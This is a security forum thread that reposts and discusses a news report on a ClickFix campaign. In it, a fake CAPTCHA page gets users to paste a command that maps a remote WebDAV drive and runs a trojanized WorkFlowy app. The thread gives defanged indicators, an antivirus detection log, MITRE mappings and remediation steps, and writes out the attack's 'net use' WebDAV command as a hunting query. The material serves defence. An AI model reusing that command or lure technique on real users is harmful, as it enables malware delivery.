Security News Investigating a New Click-Fix Variant

Parkinsond

Parkinsond

Level 62
Thread author
Verified
Well-known
Dec 6, 2023
5,193
14,895
6,069
Content source
https://thehackernews.com/2026/03/investigating-new-click-fix-variant.html
In this version, the initial vector of attack is the same as in all the other ones, a web page posing as a captcha mechanism – “happyglamper[.]ro”. It prompts the user to open the Run application via “Win+R”, followed by “Ctrl+V” and “Enter”
Click to expand...
Website is not detected by both VT and NSW

VirusTotal

VirusTotal
www.virustotal.com www.virustotal.com

Safeweb

safeweb.norton.com safeweb.norton.com

The copied malicious code to clipboard when save as cmd file is not detected by VT

VirusTotal

VirusTotal
www.virustotal.com www.virustotal.com

Typically, at this stage, attackers have used PowerShell or mshta to download and execute the next stage of the malware. Here, instead, we can see that “net use” is being used to map and connect to a network drive of an external server from which a Batch script is executed. While not novel, these TTPs were never seen in ClickFix attacks before. Combined with the next uncommon stages of infection patterns, this campaign gives Adversaries high chances to evade defensive controls and stay under the radar of defenders.

The initial execution script “update.cmd” is loaded from the mapped drive and executed; after that, the mapped drive is removed.
Click to expand...

thehackernews.com

Investigating a New Click-Fix Variant

New ClickFix variant maps WebDAV drive to run trojanized WorkFlowy app, enabling stealth C2 beacon and payload delivery.
thehackernews.com thehackernews.com
 
  • Like
Reactions: Khushal, stonjean633, simmerskool and 2 others
1773413306985.png

Event: Malicious object detected
User type: Initiator
Application name: firefox.exe
Application path: C:\Program Files\Mozilla Firefox
Component: Web Threat Protection
Result description: Detected
Type: Trojan
Name: HEUR:Trojan.Script.Generic
Precision: Heuristic analysis
Threat level: High
Object type: File
Object name: captcha.html
Object path: https:// happyglamper . ro/wp-content/plugins/mammoth-custom-for
SHA256 of an object: E63AA2ABA5D15EFE177D4C714B6AAE708521B15E74467592D4C4A6C4F7A462D7
MD5 of an object: 0A79B7D7FD87603437F6BE832DDB8C5B
Reason: Expert analysis
Databases release date: Today, 13/03/2026 10:29:00
Click to expand...
 
  • Like
  • +Reputation
Reactions: Khushal, stonjean633, simmerskool and 4 others
Executive Summary
This incident involves a confirmed malicious social engineering campaign (Click-Fix) where users are manipulated into executing a malicious WebDAV network mapping command via a fake CAPTCHA page. Hard telemetry confirms the delivery of a trojanized WorkFlowy Electron application that establishes a beacon to a known C2 server.

Assessment
Indicates this is a multi-stage infection leveraging default Windows binaries to evade detection while establishing persistent unauthorized access.

Technical Analysis & Remediation

MITRE ATT&CK Mapping

T1059.003
Command and Scripting Interpreter: Windows Command Shell

T1059.001
Command and Scripting Interpreter: PowerShell

T1132.001
Data Encoding: Standard Encoding

T1071.001
Application Layer Protocol: Web Protocols

T1204.002
User Execution: Malicious File

CVE Profile
N/A (Social Engineering)
CISA KEV Status: Inactive

Telemetry

IPs
94.156.170[.]255
144[.]31[.]165[.]173

Domains
happyglamper[.]ro
cloudflare.report/forever/e/

Files
WorkFlowy[.]exe (v1.4.1050)
update.cmd
%APPDATA%\id.txt
flowy.zip

Constraint
The structure suggests the payload executes heavily obfuscated Node.js JavaScript directly within the V8 engine, bypassing the Chromium sandbox.

Remediation - THE ENTERPRISE TRACK (NIST SP 800-61r3 / CSF 2.0)

GOVERN (GV) – Crisis Management & Oversight

Command
Initiate incident response protocols for potential C2 beaconing and unauthorized software execution.

DETECT (DE) – Monitoring & Analysis

Command
Query EDR/SIEM for process executions of cmd[.]exe /c net use Z: https://94.156.170[.]255/webdav.

Command
Hunt for network connections to 144[.]31[.]165[.]173 or DNS requests for cloudflare.report.

Command
Scan file systems for the presence of %LOCALAPPDATA%\MyApp\WorkFlowy.exe and %APPDATA%\id.txt.

RESPOND (RS) – Mitigation & Containment

Command
Isolate affected endpoints from the corporate network immediately.

Command
Terminate any active WorkFlowy[.]exe and powershell[.]exe child processes associated with the attack chain.

RECOVER (RC) – Restoration & Trust

Command
Remove the %LOCALAPPDATA%\MyApp directory, %TEMP%\dl.zip, %APPDATA%\id.txt, and any dynamic staging directories in %TEMP%.

Command
Validate clean state via full-system anti-malware scans.

IDENTIFY & PROTECT (ID/PR) – The Feedback Loop

Command
Implement Web Content Filtering blocks for happyglamper[.]ro and cloudflare.report.

Command
Restrict outbound WebDAV traffic to untrusted external IP addresses.

Remediation - THE HOME USER TRACK (Safety Focus)

Priority 1: Safety

Command
Disconnect from the internet immediately.

Command
Do not log into banking/email until verified clean.

Priority 2: Identity

Command
Reset passwords/MFA using a known clean device (e.g., phone on 5G).

Priority 3: Persistence

Command
Check Scheduled Tasks, Startup Folders, and Browser Extensions.

Command
Manually delete the %LOCALAPPDATA%\MyApp folder and the %APPDATA%\id.txt tracking file if present.

Hardening & References

Baseline
CIS Benchmarks for Windows 10/11 (Disable outbound WebDAV/SMB and Windows Script Host where not explicitly required).

Framework
NIST CSF 2.0 / SP 800-61r3.

Source
The Hacker News
Click to expand...
 
  • Like
Reactions: simmerskool, Behold Eck, harlan4096 and 1 other person

You may also like...